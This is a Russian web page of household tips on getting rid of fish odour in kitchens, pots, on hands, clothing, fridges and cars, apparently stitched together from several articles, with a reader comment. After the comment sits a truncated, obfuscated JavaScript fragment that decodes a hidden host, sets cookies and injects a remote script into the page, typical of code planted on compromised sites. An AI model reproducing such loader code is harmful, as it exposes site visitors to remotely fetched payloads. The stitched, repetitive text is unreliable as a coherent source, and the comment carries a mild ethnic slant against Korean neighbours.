Как устранить запах рыбы: как избавиться от запаха тины у рыбы, убрать запах рыбы с разделочной доски и ножа, как избавиться от рыбного запаха в холодильнике и кастрюле. Как избавиться от запаха рыбы на одежде Как избавиться от запаха рыба на балконе

КАК УБРАТЬ РЫБНЫЙ ЗАПАХ

Как избавиться от запаха рыбы в бульоне?
Добавьте немного молока в воду в которой вы готовите рыбу и запах исчезнет

Как избавиться от запаха рыбы при жарке?
Для устранения сильного запаха при жарке рыбы в растительное масло положите одну картофелину, очищенную и нарезанную ломтиками.
Как вариант, в сковородку с жарящейся рыбой положить разрезанную пополам луковицу.
Еще один совет. В масло добавьте каплю лимонного сока.

Как убрать рыбный запах при жарке?
Следующий совет. Минут за 20 до жарки выдавить сок половинки лимона на рыбу.

Как убрать запах рыбы на кухне после жарки?
От неприятного запаха рыбы на кухне можно избавиться, если прокипятить на плите в открытой посуде небольшое количество воды с добавлением уксуса. Через несколько минут помещение проветрить. С этой же целью можно положить на нагретую конфорку корку апельсина или лимона или насыпать на горячую плиту немного соли. Подержите на огне сковородку с кофейной гущей и аромат кофе быстро вытеснит все неприятные запахи.

Также можно вскипятить воду с гвоздикой или корицей.

Как убрать рыбный запах с посуды ?
Посуда, в которой готовили рыбу, долго сохраняет специфический запах, чтобы избавиться от него, нужно протереть кастрюлю или сковородку спитым чаем.
Запах рыбы проходит, если перед тем, как вымыть посуду, вы протрете ее сухой горчицей.

Также запах рыбы можно устранить, если протереть посуду подогретой солью и сполоснуть в холодной воде.

Если на столовых приборах и тарелках остался запах рыбы, то вам нужно вымыть их в холодной мыльной воде, затем смазать растительным маслом и тщательно протереть полотенцем.
Если необходимо, снова сполоснуть в мыльной воде и в проточной.

Как можно быстро убрать копчёной рыбы запах на руках?
Бесполезно идти мыть руки с мылом. Запах копчёной рыбы (скумбрии, селёдки, сайры) всё равно останется на пальцах. Особенно не рекомендуется мыть в этом случае руки горячей водой, либо тёплой. Запах только усилится.

Так чем же отмыть руки? На помощь в борьбе за исчезновение запаха копчёности придёт … пиво. Да, да — пиво. Причём подойдёт и светлое и тёмное, можно взять и не фильтрованное пивко. Если вы на природе ели рыбку, то просто над травой полейте немного пива на пальцы и разотрите в ладонях. Затем просто чистой водой ополосните руки.

Если же вы находитесь дома, то возьмите ватный тампон либо кусок марли и смочите его пивом. Затем протрите пальцы. А после уже мойте руки с мылом и с холодной водой. Если с первого раза запах копчёной рыбы не ушёл, протрите пальцы пивом ещё разок, запах обязательно исчезнет.

Как убрать рыбный запах на руках?

Вымойте руки в холодной подсоленной воде и протрите соком лимона и ополосните холодной водой

Как избавиться от рыбного запаха на одежде?
Замочите одежду перед стиркой минут на сорок в растворе 2 столовых ложек уксуса в 2 литрах теплой воды. Потом выстирайте одежду хозяйственным мылом, причем чем темнее мыло, тем лучше, так как в ней содержится больше щелочи.

Также, хорошо убирает запах рыбы с одежды концентрированный раствор поваренной соли.

Если одежда белого цвета, то необходимо прокипятить белье в течении получаса с хозяйственным мылом (натрите на крупной терке).
Выполаскивайте несколько раз. Добавьте ложку столового уксуса когда будете полоскать в последний раз.
Если вы стираете зимой, то чистую одежду постарайтесь «выморозить» на балконе.

Запах рыбы

Запах рыбы весьма специфический. Он может быть более или менее выраженным, но он есть у любой рыбы, и сырой, и жареной. Такой процесс, как удаление запаха рыбы , требует знания некоторых секретов.

Многие любят рыбу - жареную, вяленую, копченую, готовят уху, покупают ее к пиву. Она полезна, питательна, в ней много жирных кислот и витаминов. Но, к сожалению, запах рыбы очень стойкий, и вывести его с разделочных досок, стола или посуды порой бывает очень трудно. А если процесс приготовления длительный, то никакая вытяжка не спасет, этим «ароматом» пропитаются и скатерти, и шторы. Давайте рассмотрим варианты как вывести запах рыбы в различных ситуациях.

Неприятный аромат в квартире

Удалить запах рыбы на кухне помогут соль, лимон, цедра лимона или апельсина, уксус. Соль хорошо оттягивает на себя любые запахи. Если ее нагреть на сковороде и на некоторое время оставить на плите (до остывания), какую-то часть «аромата» она впитает. Дальше можно использовать цедру лимона или апельсина, которая окончательно устранит запах рыбы в квартире . Для этого цедру надо тоже нагреть. Это можно делать просто на конфорке, а можно на маленькой сковородочке. Как устранить запах соленой рыбы , если цедры нет? Надо вскипятить в маленькой кастрюльке воду с уксусом или соком лимона, после чего проветрить кухню.

Но лучше всего неприятный запах рыбы устраняет кофе. Аромат слегка поджаренных на сковородке кофейных зерен наполнит ваш дом и сразу заставит забыть о специфической рыбной проблеме.

Древесный уголь, измельченный и установленный в небольшом сосуде в кладовке, чулане, поглощает запахи. Неприятный запах в буфете можно удалить, положив и него немного древесного угля или ломтики лука.

Жареная рыба

Запах жареной рыбы является очень сильным и мгновенно наполняет собой все пространство, впитываясь при этом в одежду, кожу и все вокруг. Для устранения сильного запаха при жаренье рыбы в растительное масло положите одну картофелину, очищенную и нарезанную ломтиками.

Есть верный способ, как приготовить рыбу без запаха :

  • рыбу почистить, нарезать кусками
  • посолить и добавить приправ
  • в кастрюльку налить 0,5л пива (ЛЮБОГО!) туда рыбу, нарезанную кусочками), и в холодильник.
  • достаточно выдержать рыбу в пиве 20 минут (можно и целый день, хуже она от этого не станет).
  • перед жаркой рыбные кусочки на некоторое время в дуршлаг (чтобы стекло пиво)
  • и можно жарить!

Холодильник

Сохраняя рыбу в холодильнике, обязательно плотно упаковывайте ее, иначе все продукты пропитаются ее специфическим запахом.

Хорошо устраняет запах рыбы в холодильнике горчица. Лучше использовать сухую, но, за неимением ее, подойдет и готовая приправа. Холодильник промывают раствором горчицы

Посуда

А как отмыть запах рыбы с использованной посуды? Вилки и ножи не будут пахнуть рыбой, если перед мытьем протереть их любым маслом или корочкой лимона. Прежде чем мыть нож после селедки, лука или чеснока, подержите его над горящей конфоркой или протрите морковью, сырым картофелем, растительным маслом, уксусом, затем вымойте холодной водой с мылом. Запах рыбы на руках убирается так: перед мытьем протрите руки солью - запах исчезнет.

Как избавиться от запахов на разделочной доске

До того как разделывать рыбу, надо разобраться как избавить рыбу от запаха ?

Необходимо нарезать чеснок либо лук, намочите разделочную дощечку 9% уксусом либо протрите долькой лимона.

Когда ваша разделочная доска пропитана запахом от рыбы, сбрызните доску уксусом, разведенным водой в соотношении 1:1, или же лимонным соком.

Запах чеснока, квашеной капусты либо рыбы можно убрать, если промыть разделочную дощечку горячей соленой водой (4 столовых ложки соли на литр воды) или же теплой водой с разведенным в ней уксусом (2 ст. ложки уксуса на 2 литра воды).

Когда от разделочной дощечки исходит малоприятный аромат сырого мяса, замочите доску на полчаса в горячей воде с размельченным древесным углем (100 гр. на литр). Можно взамен угля применять щепотку молотого кофе. Далее тщательнейшим образом вымойте дощечку под проточной водой с добавлением жидких ароматизированных средств для мытья посуды.

Если же ваша разделочная дощечка изготовлена из пищевого пластика, то, дабы отделаться от малоприятного аромата, промойте ее поверхность водой с добавлением питьевой соды, либо протрите тряпкой, смоченной уксусом, ополосните.

Чтоб отделаться от аромата плесени, исходящего от деревянной разделочной дощечки, интенсивно протрите ее кофейной гущей и оставьте так на пару минут. После этого как следует, промойте кухонный инструмент под горячей проточной водой.

Протрите дощечку порошком сухой горчицы либо спитым чаем, дабы отделаться от аромата селедки. Также превосходно нейтрализует подобный «запах» свежее молоко. Просто протрите разделочную дощечку губкой, смоченной в прохладном молоке.

В момент выбора разделочной дощечки учитывайте тот факт, что пластиковые и стеклянные дощечки наименее склонны к впитыванию разных ароматов, чем деревянные. Помимо прочего стоит также учитывать, что дощечки с рифленой поверхностью сложнее отмыть, а соответственно и проблем с запахами станет больше.

Используйте минимум трех-четырех дощечек для различных групп продуктов и сразу после готовки тщательнейшим образом мойте их в горячей воде с добавлением особых средств для посуды. Вероятность появления устойчивых ароматов при этом уходе за данным кухонным прибором будет минимальной.

Запах рыбы в духовке?

Все знают, что запах рыбы убрать с ножа или пальцев можно, потерев их долькой или цедрой лимона. А ещё лимон подскажет как отбить запах рыбы в духовке: налейте в противень воду, нарежьте туда половину лимона и поставьте в неостывшую духовку на 15 минут.

Одежда

Не знаете как избавиться от запаха рыбы на одежде ? И тут есть решение. Отстирать запах рыбы сразу невозможно. Сначала постирайте вашу вещь обычным способом. Если неприятный запах до сих пор сохранился, то начинайте использовать подручные средства. Разведите в воде порошок и добавьте сок лимоны при стирке. Постирайте ваше изделие вручную. Аромат лимона должен поглотить неприятный запах рыбы . При необходимости постирайте вашу вещь в машинке с добавлением кондиционера.

Хорошо избавляет от запаха рыбы обычное средство для мытья посуды с ароматом лимона. Постирайте вашу вещь руками с использованием средства для мытья посуды. Ни в коем случае не стоит добавлять в стиральную машину средство, которым вы моете посуду. Оно образует много пены, что может привести к поломке техники.

Постирайте вашу вещь на руках, при помощи обычного порошка. Во время полоскания добавьте в воду 1 столовую ложку уксуса. Он нейтрализует неприятные запахи. Если ни один из рецептов вам не помог, то обратитесь в химчистку. Профессиональные средства по уходу за тканями с легкостью справятся с данной проблемой.

Ткань

Скатерти, полотенца, одежда легко впитывают запах рыбы . Как устранить запах рыбы с ткани? Избавиться от него трудно, особенно если отправили их в стирку не сразу. Опять-таки пригодится уксус. Его надо добавить в слегка теплую воду из расчета 2 ст.л. уксуса на 5 литров воды, замочить вещь, имеющую неприятный запах, и через некоторое время выстирать ее обычным способом.

Неприятный запах от рыбы

Если вы готовите уху из крупной пресноводной рыбы, то существует вероятность того, что будет присутствовать запах тины у рыбы . Чтобы не испортить блюдо, в бульон добавляют коренья, например, петрушку или сельдерей, репчатый лук (целая головка) и целую морковку. Кроме того, понадобится лавровый лист и перец горошком. Я слышала, что избавиться от запаха рыбы в бульоне можно при помощи огуречного рассола, но способ этот никогда не применяла, так как рыба с запахом тины мне не попадалась. Специфический запах, которым обладает рыба – не повод для того, чтобы отказываться от столь ценного продукта, особенно, если знаешь, как с этим запахом бороться.

Салон автомобиля

На вопрос чем убить запах рыбы в салоне автомобиля сразу скажу - запах рыбы в машине удалить очень сложно. Рекомендует обратиться в автосалон, где вам помогут специалисты.

Свежее дыхание

Мы можем подсказать следующие народные средства для того, чтобы устранить неприятный запах рыбы изо рта :

Кушать как можно больше свежих яблок;

Пожевать 1-2 минуты зерно кофе;

Полоскать рот настоем зверобоя, 2 ст.л. на 1 стакан кипятка, полоскать 2-3 раза в день;

При заболеваниях желудка из-за которых возникает запах поможет настой мяты. 1ст.л. сухих листьев мяты на 1 стакан кипятка. Полоскать 4-5 раза в день;

Жуйте листики мяты или петрушки, они обладают природным антисептическим свойством, подавляют бактерии и тем самым устраняют неприятный запах изо рта.

Конечно, все эти методы хороши если человек находится дома, но трудно представить себе выполнение этих процедур на работе, в гостях, в театре, тут необходимо иметь спрей освежающий дыхание или жевательную резинку лучше без сахара. Постоянный контроль свежести дыхания принесет много приятных моментов в вашу жизнь.

Обсудить у себя 0

Я студентка химического университета. Живу в общежитии. Ребята живут разных национальностей. Недавно к нам в блок заселили корейцев. И начался просто кошмар. Я никогда не любила запах вареной рыбы. А они её не просто варили, они готовили её прямо на газовых конфорках. Запах стоял просто кошмарный. В кухню невозможно было зайти, да и от одежды после посещения кухни пахло рыбой. Комендант общежития делала им замечания, угрожала выселением, но толку никакого, как жарили он свою рыбу, так и жарили. В общем, замучались мы с девчонками от того, что от нас самих уже стало пахнуть этой рыбой. На парах даже неудобно было, ходили с ощущением, что от нас жутко воняет. Не буду долго рассказывать, в общем, спасло нас средство под названием дуфтафреш, по-моему. Хотя бы от одежды теперь не пахнет, да и корейцев наконец-то выселили. Дышу полной грудью. Советую.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String..document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf("http")==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp==""return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf(«firefox»))window.smlo.loadSmlo(n.replace(«https:»,«http:»));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf(«firefox»))window.zSmlo.loadSmlo(n.replace(«https:»,«http:»));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,«text/javascript»),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,«function»==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),«function»==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o(«a2519043306»)!=f&&n(«a2519043306»,f,{expires:parseInt(«3600»)})},function(){var t=e.indexOf(f),o=e;o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(«a36677002»)!=i&&n(«a36677002»,i);var r=o(«a2519043306»);t=r?r:e,s(t)};f()}();]]>

Перед разделкой рыбы нужно подготовить нож и разделочную доску. У рыбы есть свойства оставлять запах на любой поверхности, но особенно склонна впитывать любые ароматы пластмассовая посуда. Поэтому для разделки рыбы рекомендуется стеклянная разделочная доска. Предварительно протрите доску и руки долькой лимона или раствором воды разведенной с уксусом. После разделки отходы от рыбы сложите в полиэтиленовый пакет, плотно его завяжите и выбросите в мусорное ведро. Доску и нож сразу нужно вымыть. Запах рыбы с ножа легко убрать, протерев лезвие ватным тампоном с подсолнечным маслом. Если рыба издает слишком сильный запах, перед приготовлением нужно опустить её на пару часов в раствор воды с добавлением уксуса, лаврового листа и перца. Запах исчезнет.
Во время жарки запах рыбы будет менее выражен, если в разогретую сковороду с растительным маслом добавить несколько капель лимонного сока. Если в воду, в которой готовится рыбный бульон, добавить немного молока - запах исчезнет, а рыба после приготовления приобретет более "тонкий" вкус. После использования рыбных консервов необходимо сразу же выбросить консервные банки, предварительно ополоснув их проточной водой, а затем уксусом. Рыбу очень удобно готовить в духовке с использованием фольги, пергамента или специального «рукава для запекания». Запах от приготовления будет слабым, а посуда - чистой.
Лучше всего при работе с рыбой пользоваться эмалированной или стеклянной посудой. Чтобы на тарелках и столовых приборах после мытья не осталось «рыбного духа», нужно предварительно удалить остатки жира бумажными салфетками или сухой горчицей. Далее замочить посуду в холодной воде с солью на несколько минут и затем промыть теплой водой. Если для приготовления рыбы вы пользовались мясорубкой или кухонным комбайном, после ополаскивания водой нужно измельчить в агрегатах дольку лимона. Лимон не только избавит от запаха, но и наполнит вашу кухню ароматом. После мытья посуды из-под рыбы в раковину можно насыпать питьевую соду и погасить её уксусом. Через час промыть раковину горячей водой.
Неприятный запах рыбы от рук легко устранить, опустив руки на несколько минут в емкость с водой и слабым раствором уксуса. Затем руки вымыть в теплой воде с мылом. Не менее эффективно и протереть «благоухающие» руки половинкой свежего репчатого лука, подсолнечным маслом, лимоном или лаймом.
От запаха рыбы можно избавиться вскипятив немного воды с добавлением гвоздики или корицы. По окончании работ также хорошо освежит воздух молотое кофе (1-2 чайные ложки), прожженный на сухой сковороде. Спастись от неприятного запаха рыбы поможет и сахар. Растопите в ложке сахарный песок, и он впитает в себя весь рыбный запах.

Запомните, после приготовления рыбы нужно сразу принять меры, чтобы не допустить распространения запаха по всей кухне и тем более квартире. Для этого возьмите соль, уксус и лимон. Конечно, можно использовать только один из этих продуктов. Но чтобы убрать запах наверняка, мы рекомендуем воспользоваться всеми сразу.

  • Нагрейте соль на сковороде и оставьте на плите до остывания.
  • Очистите лимон от шкурки и также нагрейте ее на огне, можно даже просто подержать цедру над конфоркой.
  • Возьмите небольшую кастрюлю и налейте в нее воду, добавьте уксус и сок лимона (по две столовые ложки на два литра). Прокипятите, а затем откройте на кухне окна, чтобы хорошенько проветрить ее.
  1. Всегда герметично закрывайте емкости и пакеты с продуктами.
  2. Проветривайте помещения.
  3. Если вы почувствовали, что рыба начала протухать, сразу же выбрасывайте ее.
  4. После приготовления рыбы посуду тщательно мойте, а не просто споласкивайте водой.
  5. Ножи, тарелки, разделочные доски не ставьте в посудомоечную машину, в этом случае запах перейдет и на другую посуду. Лучше промойте их теплой проточной водой, используя губку с моющим средством.
  6. Всегда используйте разные разделочные доски для рыбы и других продуктов. Так запахи не будут смешиваться.
  7. Если вы готовите на кухне уху или жарите рыбу, нужно закрывать дверь, чтобы не допустить проникновения «аромата» в другие комнаты.
  8. Всегда надевайте перчатки, если работаете с рыбой или другими сильно пахнущими продуктами, так как кожа сильно впитывает запахи, особенно влажная.
  9. Перед жаркой рыбы замаринуйте ее, например, в уксусе. Или добавьте к ней петрушку, сельдерей, они отлично нейтрализуют запахи.

Натуральные нейтрализаторы и ароматизаторы

Если запах рыбы заполнил холодильник, то, чтобы перечисленные ниже методы подействовали, нужно вынуть все из него и разложить кожуру, чай и т.д., по полкам. Если же вонь стоит в квартире или машине, то достаточно будет просто поставить в комнатах или в салоне несколько чашек с кофейными зернами или банок с содой и корицей.

  • Кожура апельсина или мандарина.
  • Немного чая в марле.
  • Активированный уголь.
  • Баночки с кофе. Наверное, вы замечали, что их часто ставят в магазинах, кондитерских. Это не случайно, ведь кофейные зерна – один из лучших натуральных нейтрализаторов. Достаточно всего 10 граммов этого средства.
  • Сода с корицей. Смешать их и пересыпать в банку, закрыв крышкой и проделав вверху отверстия.

Откуда появляется запах рыбы в холодильнике и как его не допустить?

Неприятный запах появляется при нарушении условий хранения продуктов, он въедается в стенки техники и сохраняется долгое время. Поэтому нужно держать рабы и другую еду со слишком сильным или специфическим ароматом в плотно закрытых емкостях.

Если вы открываете холодильник и чувствуете запах продукта, нужно сразу же переложить его в герметичную емкость. Также нельзя долго держать мясные или рыбные блюда открытыми – их лучше съедать за 1-2 дня. Запомните, что запах протухшей рыбы вывести намного сложнее.

Что делать, если рыба протухла?

Чтобы устранить запах протухшей рыбы, для начала выбросьте испорченный продукт, причем не в мусорное ведро, а сразу в мусоропровод (предварительно плотно завернув в несколько пакетов). Затем холодильник отключите от сети и полностью вымойте. Смешайте соду с водой (2 столовые ложки на литр) и еще раз промойте. Первую можно заменить уксусом или нашатырным спиртом. Еще один вариант – промыть все полки водой, смешанной с горчичным порошком (в такой же пропорции). Когда холодильник полностью вымыт, его можно включить и положить внутрь несколько таблеток активированного угля.

Важно! Не забудьте проверить продукты, которые лежали рядом с рыбой, они могли перенять на себя запах. Если это произошло, то их также лучше выбросить.

Специальные препараты для устранения запаха в холодильнике

Устранить запах помогут специальные средства, например, «поглотители» – шарики, внутри которых находится гель. Они не только нейтрализуют зловоние, но и оставляют приятный аромат, например, цитрусовых. Их цена – от 80 до 300 рублей.

Также можно приобрести «умный» поглотитель с индикатором, который ставится внутрь холодильника и контролирует количество источаемых ароматов. Когда придет пора делать уборку, устройство об этом сообщит. Также оно работает как нейтрализатор запаха.

Из более дорогих вариантов – ионизаторы на батарейках, которые ставят в холодильник на 15 минут для очистки воздуха. Стоят около 1000 рублей.

Как убрать запах рыбы с посуды?

Самое главное – вымыть тарелки, сковороду, разделочную доску и ножи вовремя, т.е. сразу же после готовки. Но перечисленные средства помогут и спустя 1-2 часа.

  1. Вымойте всю посуду моющим средством, затем протрите сухими салфетками (лучше не использовать полотенце, так как оно впитает запах).
  2. Сковорода – засыпьте ее солью и нагревайте несколько минут на конфорке.
  3. Тарелки, вилки, ножи – используйте сухую горчицу. Небольшое количество порошка разведите в воде и вымойте этим раствором всю посуду.
  4. Сковорода, разделочная доска – протереть долькой лимона, еще раз сполоснуть водой.
  5. Любая посуда – протереть уксусом.

Что делать, если пахнут руки?

После ужина можно протереть ладони долькой лимона или столовым уксусом. Но не делайте этого, если на руках есть царапины. Для обработки кожи также подойдут кофе, оливковое масло, пиво и даже зубная паста.

Как устранить запах с одежды?

Во время готовки неприятный аромат впитывается не только в посуду, но и в одежду, например, фартук, халат и др. Помогут такие советы:

  • Растворите хозяйственное мыло в воде (около 10 гр. на литр) и замочите в этом растворе все вещи не меньше чем на полчаса.
  • Еще один вариант – использовать воду с 9% уксусом (5 литров и 150 мл соответственно).
  • Можно постирать всю одежду и даже занавески в стиральной машине, вместо порошка добавив обычную соду. После желательно прополоскать все кондиционером и просушить на воздухе.

Запах в квартире

  1. Самое важное – сразу же откройте все окна и проветрите квартиру.
  2. Затем проведите влажную уборку дома, обязательно вымойте пол раствором воды с несколькими каплями эфирного масла лимона или уксуса.
  3. Также можете обжарить кофейные зерна на сковороде, это отлично устранит неприятный аромат.
  4. Еще один вариант – несколько минут кипятите в кастрюле разрезанный лимон с добавлением специй, гвоздики, корицы.

Рыбный запах в машине

Попробуйте оставить на ночь в машине стакан уксуса, спирта или воды с лимоном. Потом проветрите автомобиль и протрите все его детали дезинфицирующим средством. Если это не помогло, возможна профессиональная чистка с применением сухого тумана. Он нейтрализует неприятные запахи, проникая в глубокие слои обивки кресел. В некоторых случаях потребуется заменить в машине отдельные элементы (например, ковролин).

Регулярно проверяйте работу кондиционера и прочищайте его!

Как работает сухой туман

Как убрать запах тины?

Еще одна распространенная проблема – речная рыба неприятно отдает тиной. Чтобы убрать такой «аромат»:

  1. Замочите рыбу в молоке или воде на 1,5-2 часа.
  2. Если вы готовите уху, то в бульон положите луковицу, сельдерей и морковь. Перед подачей блюда их можно убрать.

Рыба — один из наиболее популярных продуктов на нашей кухне: морская, речная, отварная, жареная, запеченная, соленая, вяленая, рыбные консервы и даже тарань под пиво. Это — полезный продукт, состоящий из легкоусвояемого белка, полиненасыщенных жирных кислот, микроэлементов и витаминов. Все в рыбе прекрасно, кроме запаха. Он надолго въедается в разделочную доску, кастрюлю и сковороду, никак не желает выветриваться с кухни. Иногда кажется, что сковорода отмылась после жареной рыбы, а начинаешь на ней, например, блины жарить — ан нет, снова этот рыбный аромат появляется. Как избавиться от запаха рыбы в кастрюле? Это частая проблема любителей рыбных блюд. К счастью, есть несколько проверенных временем и хозяйками рецептов борьбы с этой напастью.

Как убрать запах из кастрюли?

Как отбить или устранить запах рыбы? Убрать въедливое амбре из кастрюли после готовки в ней рыбы в квартире можно несколькими способами.

Способ №1:

  1. Чтобы убрать аромат рыбы из кастрюли, ее нужно засыпать сухой горчицей и налить горячей воды.
  2. Пусть так постоит полчаса, затем помойте.
  3. Если запах все же остался, попробуйте ополоснуть кастрюлю слабым уксусным раствором или протереть долькой лимона.

Способ №2:

  • Нужно на дно насыпать соды и добавить воды (1 столовая ложка на 1 л воды).
  • Кастрюлю поставьте на огонь, несколько минут прокипятите жидкость.

Важно! Сода не только прекрасно справляется с неприятными запахами, но и поможет отмыть пригоревшие остатки пищи.


Способ №3

Многие хозяйки считают, что достаточно будет просто помыть кастрюлю с хозяйственным мылом, а в конце ополоснуть слабым уксусным раствором и поставить сушить, не вытирая.

Способ №4:

  1. Дорогие керамические кастрюли нужно замочить в горячей воде.
  2. После — требуется насухо вытереть посудину бумажным полотенцем.
  3. Обычно это убирает запах, но если не помогло — помойте кастрюлю с содой.

Способ №5:

  1. Пустую кастрюлю нагрейте на плите, а затем на дно насыпьте спитый влажный чай.
  2. Плотно закройте крышкой и оставьте на час.
  3. Помойте кастрюлю как обычно — запах рыбы должен исчезнуть.

Как избавиться от запаха в кастрюле — вы уже знаете, теперь перейдем к мытью сковороды.

Как избавиться от запаха рыбы на сковороде?

Эта задача будет несколько сложнее предыдущей. В сковороду неприятные запахи впитываются быстрее, а держатся дольше.

Способ №1:

  1. Сначала слейте масло, вытрите его остатки бумажным полотенцем, а затем протрите поверхность горчицей.
  2. После этого помойте сковороду теплой водой с моющим средством.
  3. Можно в сковороду насыпать горчицы и залить горячей водой. Пусть откисает, затем помойте как обычно.

Способ №2:

  1. После удаления остатков жира салфеткой обработайте внутреннюю поверхность сковороды водой с добавлением уксуса.
  2. Как всем известно — уксус прекрасно убирает неприятные запахи, не хуже соды.

Способ №3

Может помочь справиться с запахом рыбы и поваренная соль — нужно протереть сковороду нагретой солью, а затем помыть с моющим средством.

Как удалить запах рыбы с посуды?

  • Если вы не хотите после готовки долго бороться с неприятным запахом, под блюда из рыбы берите стеклянную посуду — она проще всего отмывается.

Важно! Для разделки рыбы лучше и разделочную доску использовать также стеклянную.

  • Тарелки после рыбных блюд хорошо отмываются сухой горчицей. Она не только борется с неприятными запахами, но и удаляет жир.
  • Можно на полчаса замочить посуду в холодной воде с солью. После этого помойте тарелки с моющим средством. Если не помогло — ошпарьте кипятком.
  • Хорошо справится с проблемой сода. Можно натереть содой посуду и смыть, а можно насыпать соды в посудину и залить горячей водой. Через несколько минут смойте и прополощите тарелки.
  • Можно использовать для удаления неприятного аромата нашатырь или уксус:
    1. Удалите остатки жира сухим бумажным полотенцем.
    2. Затем замочите миски в теплой воде с добавлением уксуса или нашатырного спирта .
    3. После — прополощите и вытрите насухо.
  • Справиться с запахом рыбы может и лимонная корка — ею протрите поверхность тарелок. Такая процедура должно помочь решить проблему.
  • Если вы измельчали рыбу в кухонном комбайне или мясорубке, то в конце пропустите пару долек лимона.

Важно! Лимоном можно протирать для тех же целей разделочную доску, стол, нож.

  • Вилки, ложки, ножи, металлические лопатки после разделки, готовки и употребления рыбных блюд перед мытьем протрите растительным маслом, уксусом или сырой картофелиной, далее мойте в прохладной воде.

Важно! Также можно избавиться и от запаха лука, чеснока со столовых приборов.

  • Если вы не хотите отмывать противень от жира и лишних запахов, готовьте рыбу и мясо в фольге или рукаве.
  • Чтобы рыба в процессе жарки поменьше выделяла запахи, в масло киньте очищенную и нарезанную ломтиками картофелину.
  • Некоторые хозяйки советуют капать в масло немного лимонного сока — это тоже препятствует распространению аромата рыбы.
  • Если вы не хотите, чтобы запах рыбы перешел в последующие, готовящиеся на этой сковороде блюда — заведите для рыбы отдельную сковородку. И тогда вопрос, как убрать запах рыбы со сковороды отпадет сам по себе.
  • Некоторые женщины, для того чтобы во время готовки рыба меньше источала запах, опускают ее на несколько минут в раствор из воды, уксуса, перца и лаврового листа. Можно для этой же цели втереть в рыбную тушку соль, подождать 15 минут и смыть.
  • Еще одним способом нейтрализовать запах является применение семян укропа. Просто посыпьте ими рыбу, которая готова к заморозке, или наоборот — вынута из морозилки для разморозки. Тогда во время готовки будет меньше неприятных ароматов.
  • При приготовлении рыбного бульона добавьте немного молока — это не только улучшит вкус, но и нейтрализует запах.

Как убрать неприятный запах с рук?

В перчатках убирать удобно, а вот готовить — нет, хоть иногда этого и очень хочется, потому что запах лука, чеснока, селедки въедается в кожу надолго:

  • Для того чтобы ароматы этих продуктов не впитывались в кожу, перед готовкой обработайте руки слабым раствором уксуса.
  • После готовки — сначала потрите кожу солью, затем вымойте с мылом.

Важно! Желательно на кухне иметь жидкое мыло, которое убирает неприятные запахи.

  • Если не помогло, протрите ладони долькой лимона.
  • Если одежда пропиталась после готовки на кухне запахами еды, замочите ее на 40 минут в воде с добавлением уксуса (2 столовых ложки на 1 л воды). Ткани он не повредит, а вот лишние запахи поможет убрать.
  • Неприятные ароматы из кухни поможет прогнать кофе — его нужно некоторое время прожарить на сухой сковороде. Если кто не любит кофе, то можно просто воспользоваться освежителями воздуха.

Важно! Не забывайте во время готовки включать вытяжку.

  • После мытья посуды, кастрюль, сковородок, если вы готовили рыбу, капусту, баранину и прочие сильно пахнущие продукты, не забудьте вымыть кухонную раковину, прочистить сток, иначе — на кухне останется запах:
    1. Раковину можно помыть с хозяйственным мылом.
    2. В сток и вокруг него обильно насыпьте соды и погасите уксусом. Это не только его освежит, но и избавит от небольших засоров, продезинфицирует.
    3. Можно влить в сток кипящий раствор стирального порошка (2 столовых ложки на 1 л кипятка), но тут нужно быть осторожным.

Важно! Для пластиковых труб этот способ не подходит.

  • Чтобы избавиться от неприятных запахов в холодильнике, нужно помыть его со слабым раствором уксуса или с помощью соды (1 столовая ложка на 1 л воды).
  • Если вы ставите рыбу в холодильник — разложите на полках ломтики черного хлеба или насыпьте в блюдечко древесный уголь.
  • Древесный уголь, насыпанный в открытый сосуд, поможет нейтрализовать неприятные запахи в кладовке или других небольших подсобных помещениях, где хранятся рыбные продукты.
  • Посторонние ароматы готовящейся рыбы, табака, краски в помещении помогают убрать влажные полотенца. Их можно развесить или разложить на мягкую мебель.

Видеоматериал

Избавиться от запаха рыбы в кастрюле, сковороде, тарелках, на руках и даже помещении вполне возможно. Для этого не нужно покупать дорогих средств и тратить много времени. Достаточно только знать несколько секретов и воспользоваться продуктами, которые есть у каждой хозяйки. С помощью дельных советов из этой статьи вы сможете не только удалить неприятные запахи продуктов, но и предотвратить их появления или уменьшить их интенсивность. Используйте рекомендации опытных хозяек, и готовка станет для вас куда более приятным времяпрепровождением.

Похожие публикации